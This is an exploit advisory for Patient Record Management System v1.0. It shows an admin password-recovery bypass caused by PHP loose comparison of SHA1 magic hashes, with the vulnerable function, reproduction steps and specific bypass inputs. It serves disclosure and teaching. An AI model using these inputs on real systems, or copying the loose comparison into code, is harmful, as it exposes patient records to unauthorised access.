# Exploit Title: Patient Record Management System v1.0 - Authentication Bypass via PHP Loose Comparison # Exploit Author: Joe Pollock # Date: January 19, 2023 # Vendor Homepage: https://www.sourcecodester.com/php/13505/patient-record-management-system.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/patientrecords.zip # Tested on: Kali Linux, Apache, Mysql, PHP 8.1.5 # CVE: T.B.C # Vendor: kimcey500 # Version: 1.0 # Exploit Description: # Patient Record Management System v1.0 implements a PHP loose comparison within the password recovery functionality (secret question/answer) of # the admin account, which renders the application vulnerable to an authentication bypass depending on the secret answer chosen by the administrator. # If the secret answer generates a SHA1 magic hash (SHA1 is the hashing format used by the application to store secret answers) then an authentication # bypass of the admin account is possible using any other SHA1 magic hash. The vulnerable function is found within User_model.php and is shown below: public function get_forgot_secret($login_id, $secans){ $this->db->where('u_id', $login_id); $query = $this->db->get('users'); $decrypt = $query->row()->u_secretanswer; if(sha1($secans) == $decrypt){ // md5 encryption return $query->row(); } } ======================================================== (+) To reproduce this exploit: ======================================================== 1. Log in as the administrator and navigate to the password recovery functionality (http://localhost/Indexcontrol/secretquestion). 2. Enter the ‘Current Password’ then select any ‘Secret Question’. 3. For the ‘Secret Answer’, use the following: 10932435112 4. Confirm the ‘Secret Answer’ then click ‘Submit’. Now logout of the administrator account. 5. From the admin login page, click ‘Forgot Password?’. 6. Enter ‘admin’ as the username then click ‘Submit’. 7. For the ‘Secret Answer’, use any of the following: aaroZmOk w9KASOk6Ikap aaO8zKZF aa3OFF9m w9KASOk6Ikap 8. After clicking 'Submit, the 'create new password' functionality should be displayed and therefore authentication can be bypassed. ======================================================== (+) Explanation: ======================================================== Following from above, assume the administrator has chosen the following as their secret answer: 10932435112 The application then stores the SHA1 hash of the secret answer in the database. The stored hash is: 0e07766915004133176347055865026311692244 The above hash is an example of a 'magic hash', i.e. the hash starts with "0e" (or "0..0e") only followed by numbers. In PHP, if two strings are loosely compared (==) and match the regular expression 0+e[0-9]+, the result will be TRUE. It will then be possible to bypass the authentication of this account using any secret answer which generates a SHA1 magic hash. Any of the following secret answers could be used to bypass authentication: aaroZmOk w9KASOk6Ikap aaO8zKZF aa3OFF9m w9KASOk6Ikap See here for more examples that could be used: https://github.com/spaze/hashes/blob/master/sha1.md The comparision which would take place by the application in get_forgot_secret() is: if(sha1(aaroZmOk) == "0e07766915004133176347055865026311692244"){ //Reset password Which becomes: if("0e66507019969427134894567494305185566735" == "0e07766915004133176347055865026311692244"){ //Reset password Due to the loose comparision used (==), the above evaluates to TRUE, which would then allow the attacker to change the password of the account. You can try this yourself using the interactive PHP interpreter: var_dump(sha1('aaroZmOk') == "0e111"); var_dump(sha1('aaroZmOk') == "0e222"); var_dump(sha1('aaroZmOk') == sha1('w9KASOk6Ikap')); ======================================================== (+) References and more information ======================================================== https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Type%20Juggling/README.md http://turbochaos.blogspot.com/2013/08/exploiting-exotic-bugs-php-type-juggling.html https://www.whitehatsec.com/blog/magic-hashes/ https://github.com/spaze/hashes https://offsec.almond.consulting/super-magic-hash.html